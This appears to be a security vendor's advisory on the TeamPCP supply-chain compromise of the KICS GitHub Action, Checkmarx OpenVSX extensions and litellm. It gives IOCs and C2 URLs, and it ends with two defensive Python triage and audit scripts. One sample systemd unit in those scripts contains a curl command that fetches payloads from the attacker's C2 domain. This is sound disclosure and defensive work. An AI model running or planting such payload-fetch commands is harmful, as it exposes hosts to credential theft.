KICS GitHub Action Compromised: TeamPCP Supply Chain Attack
The KICS GitHub Action was compromised with credential-stealing malware by TeamPCP, the same group behind the Trivy attack. KICS is an open source infrastructure-as-code security scanner by Checkmarx. Between 12:58 and 16:50 UTC on March 23, any users of this GitHub Action who were pinning to one of the compromised tags would have been served the malware. The repository was taken down at 16:50 UTC, shortly after a GitHub issue was filed by a user notifying the maintainers of the incident.
The action was available at https://github.com/Checkmarx/kics-github-action prior to takedown.
Update 03/24:
11:30 UTC: The "litellm" packages (versions 1.82.7 and 1.82.8) on PyPI were trojanized. They contain the same functionality as the earlier operation, but use a new exfiltration domain: models.litellm[.]cloud. The malicious update was published at approximately 8:30 UTC and was quarantined by PyPI at 11:25 UTC. Wiz customers can see an advisory in the Threat Center.
Updates 03/23:
19:24 UTC: The repository has been reinstated, and the maintainers state "The issue is resolved now".
22:25 UTC: Sysdig reports that ast-github-action was also impacted. They were limited to observing a single malicious tag, 2.3.28. However, based on TeamPCP's tactics, we believe it is likely that all tags were impacted.
22:35 UTC: Based on a tip from independent researcher Adnan Khan, Wiz has confirmed that the Checkmarx OpenVSX extensions cx-dev-assist 1.7.0 and ast-results 2.53.0 were compromised. This was concurrently reported by ReversingLabs via tweet. See the "OpenVSX Payload" section below for details. We have reported these to OpenVSX for removal.
Update 03/24 9:00 UTC: Checkmarx has published a Security Update addressing the issues with the KICS GitHub Action and the OpenVSX plugins. They state a resolution time of 15:41 UTC for OpenVSX; however, we observed that the malicious versions were still present at the time of our report. Additionally, while new versions have been pushed, the malicious versions have yet to be removed.
This is the second popular open source security scanner that this group has compromised in the last 5 days. The operation uses familiar naming conventions and the same RSA public key, allowing Wiz to assess with high confidence that it is the same actor.
KICS Github Action Payload
The malicious code was injected in the same manner as in the Trivy incident:

- The attacker staged imposter commits (commits on a fork of the repository) containing their payload in setup.sh.
- The attacker then used what appears to be a compromised identity to directly update all 35 tags in the project and point them at those staged commits.

The malware also functions similarly, but with a few key differences:

- This version uses a new C2 domain: checkmarx[.]zone.
- The new version creates a docs-tpcp repository via the victim's GITHUB_TOKEN as a fallback in case the C2 is disrupted. In the Trivy incident, tpcp-docs was used instead.
- This version adds Kubernetes-focused persistence code, in addition to the existing credential-stealing and exfiltration code.

While kics-github-action has roughly 1% of the visible public usage of trivy-action, it is still widely adopted, publicly and privately, as an Infrastructure as Code security scanner.
We will update this post with further analysis.
Github Commit
The attack appears to have been carried out via the compromise of the cx-plugins-releases (GitHub ID 225848595) service account, as that is the identity involved in publishing the malicious tags.
OpenVSX Payload
Both compromised extensions (ast-results v2.53.0 and cx-dev-assist v1.7.0) contained identical payloads. They were published 12 seconds apart at 12:53 UTC on March 23, 2026, via the ast-phoenix account on Open VSX. The VS Code Marketplace versions appear unaffected.
Payload Execution Flow
On activation of the extension, the new malicious environmentAuthChecker.js is invoked from activateCore.js. This payload first checks whether the victim has credentials for at least one cloud provider.
If any credentials are detected, the second-stage payload is retrieved from the C2: checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz
The payload attempts execution via npx, bunx, pnpx, or yarn dlx, which covers the major JavaScript package managers. The retrieved package contains a comprehensive credential stealer.
Harvested credentials are then encrypted, using the same keys as elsewhere in this campaign, and exfiltrated to checkmarx[.]zone/vsxacetpcp.tar.gz.
On non-CI systems, the malware installs persistence via a systemd user service. The persistence script polls https://checkmarx[.]zone/raw every 50 minutes for additional payloads, with a kill switch that aborts if the response contains "youtube". Currently, the link redirects to The Show Must Go On by Queen.
Compromised Artifacts
OpenVSX Extensions
| Artifact | SHA256 |
|---|---|
| ast-results-2.53.0.vsix | 65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d |
| cx-dev-assist-1.7.0.vsix | 744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0 |
| checkmarx-util-1.0.4.tgz | 0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c |
| environmentAuthChecker.js | 527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90 |
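Host triage for the OpenVSX payload described above, as an added example (this is not Wiz's or Checkmarx's tooling): it hashes files under the editor extension directories against the SHA256 values in the table, flags any file named environmentAuthChecker.js even when its hash differs from the listed one, and inspects systemd user units for the checkmarx.zone C2 domain used by the persistence mechanism. The extension and systemd paths are assumed defaults, and the demo at the bottom builds constructed sample files in a temporary directory instead of touching a real home directory.

```python
"""Triage a workstation for the TeamPCP OpenVSX payload: IOC hash matches under
editor extension directories and systemd user units that reference the C2 domain.

Added example, not Wiz's or Checkmarx's code. IOC_SHA256 is copied from the
table above; EXTENSION_DIRS and SYSTEMD_USER_DIR are assumed default locations.
"""
from __future__ import annotations

import hashlib
import re
import tempfile
from pathlib import Path

IOC_SHA256 = {
    "65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d": "ast-results-2.53.0.vsix",
    "744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0": "cx-dev-assist-1.7.0.vsix",
    "0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c": "checkmarx-util-1.0.4.tgz",
    "527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90": "environmentAuthChecker.js",
}
C2_RE = re.compile(r"checkmarx\.zone", re.I)

# Assumed defaults; add the equivalents for Cursor, VSCodium, Windsurf, etc.
EXTENSION_DIRS = [
    Path.home() / ".vscode" / "extensions",
    Path.home() / ".vscode-server" / "extensions",
]
SYSTEMD_USER_DIR = Path.home() / ".config" / "systemd" / "user"


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_hashes(roots, iocs=IOC_SHA256) -> list[tuple[str, str]]:
    """Return (path, ioc_name) for every file whose SHA256 is in the IOC set.

    A file literally named environmentAuthChecker.js is reported as well, since a
    re-minified or re-published copy would not match the listed hash.
    """
    hits = []
    for root in roots:
        root = Path(root)
        if not root.is_dir():
            continue
        for p in root.rglob("*"):
            if not p.is_file():
                continue
            try:
                digest = sha256_file(p)
            except OSError:
                continue
            if digest in iocs:
                hits.append((str(p), iocs[digest]))
            elif p.name == "environmentAuthChecker.js":
                hits.append((str(p), "name-match (hash differs)"))
    return hits


def scan_systemd_units(unit_dir) -> list[str]:
    """Return user unit files whose contents mention the C2 domain."""
    unit_dir = Path(unit_dir)
    if not unit_dir.is_dir():
        return []
    flagged = []
    for p in unit_dir.glob("*.service"):
        try:
            if C2_RE.search(p.read_text(errors="ignore")):
                flagged.append(str(p))
        except OSError:
            continue
    return flagged


def build_sample_tree() -> Path:
    """Constructed sample: a fake extension install and two fake user units."""
    base = Path(tempfile.mkdtemp(prefix="tpcp-triage-"))
    ext = base / "extensions" / "checkmarx.ast-results-2.53.0" / "out"
    ext.mkdir(parents=True)
    # Placeholder content only; this is not the real payload, so it will name-match, not hash-match.
    (ext / "environmentAuthChecker.js").write_text("// constructed placeholder\n")
    units = base / "systemd" / "user"
    units.mkdir(parents=True)
    (units / "update-check.service").write_text(
        "[Service]\nExecStart=/bin/sh -c 'curl -fsSL https://checkmarx.zone/raw'\n"
    )
    (units / "benign.service").write_text("[Service]\nExecStart=/usr/bin/true\n")
    return base


if __name__ == "__main__":
    base = build_sample_tree()
    print("hash/name hits:", scan_hashes([base / "extensions"]))
    print("suspicious units:", scan_systemd_units(base / "systemd" / "user"))
    # On a real host: scan_hashes(EXTENSION_DIRS) and scan_systemd_units(SYSTEMD_USER_DIR)
```

The name-only match is deliberately reported separately from a hash match so that an analyst can distinguish "confirmed IOC" from "needs a look"; a hash miss on a file with that name is not a clean bill of health.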
kics-github-action Releases
The v1.1 release was the only malicious release created. Other releases, triggered automatically by the tag events, failed because those versions already existed.
kics-github-action Tags
| Tag | Commit SHA |
|---|---|
| v1 | 0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1 |
| v1.0 | 45f3749467a6017cb4fb749054b498d149dd5924 |
| v1.1 | 8e20c7a67bb95632e2040327a355fb97e6014d29 |
| v1.2 | 93de85c910d859b759cf9185aa78d5a23a4b7000 |
| v1.3 | 0e7343ba084735863db92b6f8ba2fa9dee604f7c |
| v1.4 | 2dc0fa613f6f4c15f26ad98225ad253475681616 |
| v1.5 | f00191dd3352c0cd83c6cce4e6bf04b628214dd0 |
| v1.6 | e0359b1a253ee66c8018586c3225e6e9cd2d8a4f |
| v1.6.1 | dc6dbf358998c0c64da83edc8fcd581c12656b19 |
| v1.6.2 | 08b9ea97eb292d5e1f9ac2d8e21c0ba32f0fdff0 |
| v1.6.3 | 005fb0837553de722f8bf11d98e905dbdde19861 |
| v1.7.0 | a5471d37c656ecd4560e8e0b3977910f27025618 |
| v2 | 3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4 |
| v2.0.0 | 121c38fb49c9fc82160245fb6e2a9119db636e4d |
| v2.1.0 | 1e9eeaba37fe0032deba133f598e74dab0ceb3b7 |
| v2.1.1 | c5c07508527fc6a125855eebfb533e64f675bd8e |
| v2.1.2 | c999dbb9cc904e23675f9929f7e0e51d132879cf |
| v2.1.3 | 4ebf62dd8ff318412b38d19841fc3c8650e294bf |
| v2.1.4 | 3ae9f0d6f8139964635d411149f9b3e0a6eb935e |
| v2.1.5 | 96a0e8eb31c3cce6c495c9a49dd49c881cd17934 |
| v2.1.6 | 31fbf5831a2e52429738fdc0cbaa20e57872b6fc |
| v2.1.7 | fca3a20afcb8ec7f9932c060a236d2a9021fdd2b |
| v2.1.8 | 0f81f132f9f09bb4976d403914a44a1a1eb6158d |
| v2.1.9 | c0e23718a5074f3b8ad286f37b532e02057af35f |
| v2.1.10 | d66f0657133bc42f8264458063999bf1910490db |
| v2.1.11 | e35c9d6a5faffc1c5b3450d0bf09006aa9b9e906 |
| v2.1.12 | 2eee333d70fb6e14ce1d4aa73f12058bc5d70193 |
| v2.1.13 | f9641eb512f5c6530d13275903e8a97baf0925f1 |
| v2.1.14 | e8754eebc822b5122e96a6142b28dbc0e179c91c |
| v2.1.15 | 69b3f020390222a9fcb6029ba56533b2fb12f103 |
| v2.1.16 | db942a0dd7e9d1aeac72bc675bdb67f39a688b63 |
| v2.1.17 | 208813bf5feca5df9a935363cd426bc914614d0b |
| v2.1.18 | 3fdeadb81fbeddc1453163cc87bc173911fd47e2 |
| v2.1.19 | 310734c0ffd29438f6195a24e2cbbacfdc33c9ab |
| v2.1.20 | b974e53df1e3a2cd22ea90f0ec01882394feede4 |
What actions should security teams take?

- Audit KICS GitHub Actions references: Review workflows using kics-github-action. If you referenced a version tag rather than a commit SHA, check workflow run logs from the exposure window for indicators of compromise.
- Search for exfiltration artifacts: Look for repositories named docs-tpcp in your GitHub organization, which may indicate successful exfiltration via the fallback mechanism.
- Long-term hardening: Refer to Wiz's How to Harden GitHub Actions: The Unofficial Guide.

How can Wiz help?
Wiz customers should continue to follow the advisory in the Wiz Threat Center for ongoing guidance, pre-built queries, and references to relevant detections they can use to assess the risk in their environment.
Worried you were impacted? Connect with the Wiz Incident Response team.
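As an added example of the first audit step (this is not Wiz's or Checkmarx's code), the script below scans workflow text for kics-github-action references, separates commit-pinned from tag- or branch-pinned uses, checks pinned SHAs against the tag table above, and parses `git ls-remote --tags` output to see whether any tag still resolves to a compromised commit. SAMPLE_WORKFLOW and SAMPLE_LS_REMOTE are constructed inputs with placeholder SHAs; only the three entries in MALICIOUS_SHAS are taken from the table.

```python
"""Audit GitHub Actions workflows for kics-github-action references and check
what the tags currently point at against the commit SHAs in the tag table above.

Added example for this post, not Wiz's or Checkmarx's code. SAMPLE_WORKFLOW and
SAMPLE_LS_REMOTE are constructed; the 2222.../1111.../0123... SHAs in them are
placeholders, while the entries in MALICIOUS_SHAS are copied from the table.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

ACTION = "checkmarx/kics-github-action"

# Subset of the tag table above; extend with all 35 entries for a real audit.
MALICIOUS_SHAS = {
    "0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1",  # v1
    "8e20c7a67bb95632e2040327a355fb97e6014d29",  # v1.1
    "3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4",  # v2
}

# Matches `uses: owner/repo[/path]@ref`, tolerating quotes and a trailing "# comment".
USES_RE = re.compile(
    r"uses:\s*['\"]?([\w.-]+/[\w.-]+)(?:/[^@\s'\"]+)?@([^\s'\"#]+)", re.I
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


@dataclass
class Finding:
    line_no: int
    ref: str
    verdict: str  # "mutable-ref" | "sha-pinned-malicious" | "sha-pinned-clean"


def audit_workflow(text: str) -> list[Finding]:
    """Classify every kics-github-action reference in one workflow file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.search(line)
        if not m or m.group(1).lower() != ACTION:
            continue
        ref = m.group(2)
        if FULL_SHA_RE.match(ref):
            verdict = "sha-pinned-malicious" if ref in MALICIOUS_SHAS else "sha-pinned-clean"
        else:
            # A tag or branch is mutable: a run during the exposure window fetched
            # whatever the repointed tag resolved to at that moment.
            verdict = "mutable-ref"
        findings.append(Finding(n, ref, verdict))
    return findings


def parse_ls_remote(output: str) -> dict[str, str]:
    """Map tag name -> commit SHA from `git ls-remote --tags <url>` output.

    An annotated tag appears twice; the peeled `^{}` line is the commit it
    resolves to, so that entry takes precedence over the tag object itself.
    """
    tags: dict[str, str] = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) != 2 or not parts[1].startswith("refs/tags/"):
            continue
        sha, name = parts[0], parts[1][len("refs/tags/"):]
        if name.endswith("^{}"):
            tags[name[:-3]] = sha
        else:
            tags.setdefault(name, sha)
    return tags


def malicious_tags(tags: dict[str, str]) -> list[str]:
    """Tags that still resolve to a commit from the compromised set."""
    return sorted(t for t, sha in tags.items() if sha in MALICIOUS_SHAS)


# Constructed sample workflow (not from any real repository).
SAMPLE_WORKFLOW = """jobs:
  kics:
    steps:
      - uses: actions/checkout@v4
      - uses: Checkmarx/kics-github-action@v2
      - uses: checkmarx/kics-github-action@3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4 # v2
      - uses: checkmarx/kics-github-action@0123456789abcdef0123456789abcdef01234567
"""

# Constructed `git ls-remote --tags` output modelling a partially cleaned repo:
# v1 and the annotated v2 still resolve to compromised commits, v2.1.20 does not.
SAMPLE_LS_REMOTE = """0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1\trefs/tags/v1
2222222222222222222222222222222222222222\trefs/tags/v2
3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4\trefs/tags/v2^{}
1111111111111111111111111111111111111111\trefs/tags/v2.1.20
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f.line_no}: @{f.ref} -> {f.verdict}")
    print("tags still malicious:", malicious_tags(parse_ls_remote(SAMPLE_LS_REMOTE)))
```

Run it over the files under `.github/workflows/` and pipe real `git ls-remote --tags https://github.com/Checkmarx/kics-github-action` output into parse_ls_remote; a "mutable-ref" finding means the run logs for the exposure window need to be reviewed even if the tag has since been restored, because the pin itself says nothing about what was fetched at the time.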
